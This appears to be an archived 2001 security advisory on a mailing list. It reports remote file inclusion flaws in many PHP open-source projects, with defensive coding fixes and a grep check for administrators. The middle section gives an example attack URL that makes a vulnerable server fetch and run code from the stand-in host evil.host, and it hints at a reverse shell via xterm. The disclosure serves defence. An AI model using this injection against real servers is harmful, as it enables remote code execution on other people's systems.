OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: geneticsgenetics.ath.cx
Date: Tue Oct 02 2001 - 16:59:09 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    /*
     * results of semi-automatic source code audit of a
     * majority of php based open-source projects registered
     * at Freshmeat.net or Sourceforge.net
     *
     * release date: 2001-10-02
     *
     * authors:
     * atil <bugtraqjakob.weite-welt.com>
     * genetics <veenstrachello.nl>
     * #yahtircnet, Yet Another Hacker Team
     */

    --=[introduction]=--
    php comes shipped with two features enabled by default that make
    unsuspicious looking source execute arbitrary code:
    - variables passed from the browser are stored in global context
    - file-system functions work transparent on URLs

    --=[background]=--
    This exploits for php are not new and it's not the fault of php or any
    bug in the source of php itself but of the authors of a large number
    of projects written in php. What is new is the extensive audit of a
    huge amount of projects and the surprisingly large number of
    vulnerabilities discovered.

    --=[our task]=--
    We looked for files often not directly accessed by the browser but
    included from somewhere else that contained something like this:

    in helperfunction.php :
      include("$includedir/library.php");

    If the variable $includedir is not set by something executed before
    the include-statement, we can override it from the http-client with
    something like this:

    http://vuln.host/helperfunction.php?includedir=http://evil.host/code

    When the script is executed on vuln.host the php-interpreter will
    fetch the document http://evil.host/code/library.php and execute
    it. Breaking into the system is easy now because you can pass any
    php-source to the vulnerable system (download binaries, execute code,
    start reverse-shells (e.g. "xterm -display evil.host:1")...) that
    will be executed by the user running the web-server (mod_php) or by
    the owner of the virtual-host (CGI-interpreter).

    --=[solution]=--
    php is not insecure by default, but makes insecure programming very
    easy. Here are some solutions to write safe php-code:

    - give included php-files a filename that is not executed by the
      web-server

    - put all included php-code outside the docroot (not possible for
      all users), use file permissions or .htaccess

    - use constants (best approach)

      in main.php:
        define("MAINFILE", true);
        define("CONFIGDIR", "/some/path/");
        include('./some_function.inc');

      in some_function.inc:
        if ( !defined("MAINFILE") ) die ("this is a include file!");
        include(CONFIGDIR . "config.inc");

      If you set global variables from the client, they don't
      interfere with constants; the defined-Test is not necessary for
      security.

    - use $HTTP_*_VARS and disable global variables from the client

    --=[scope]=--

    Our audit searched only for vulnerabilities with include-files and can
    never be compared to a detailed analysis of a complete project. If
    your php-project didn't show up on the list below doesn't mean that
    you can relax now. We want to make people working on all this great
    php projects to become sensitive to the fact, that using modern
    scripting languages doesn't make your code safe by default.

    --=[hint for ISPs]=--
    If you are an ISP and want to identify possible exploitable php code
    on your web-server use this:

    find -type f -a -name '*.php*' -print0 |
    xargs -0 grep -l -E '(include|require)(_once)? *\( *"?\$'

    The resulting files need further manual inspection...

    --=[vulnerable projects]=--
    (all maintainers have been informed a while ago)

    Actionpoll http://sourceforge.net/projects/actionpoll
    AWOL http://www.freshmeat.net/projects/awol
    CCC http://www.cccsoftware.org
    DarkPortal http://sourceforge.net/projects/darkportal
    Empris http://empris.sourceforge.net
    Moregroupware http://www.moregroupware.org
    Phorecast http://phorecast.org
    Phormation http://www.peaceworks.ca/phormation.php
    pSlash http://www.pslash.com
    The Gallery http://sourceforge.net/projects/gallery
    webodex http://homepage.mac.com/ghorwood/webodex
    Zorbstats http://freshmeat.net/projects/zorbstats
    phpAdsNew http://sourceforge.net/projects/phpadsnew
    myphppagetool http://myphppagetool.sourceforge.net
    ActionPoll http://sourceforge.net/projects/actionpoll
    SIPS http://sips.sourceforge.net
    thatware http://thatware.org

    We don't provide the exact vulnerable pice of code but we secured our
    results with at least one machine (mostly the demo-site of the project)
    where we could execute a phpinfo()-script comming from our webserver.

    cheers

    atil & genetics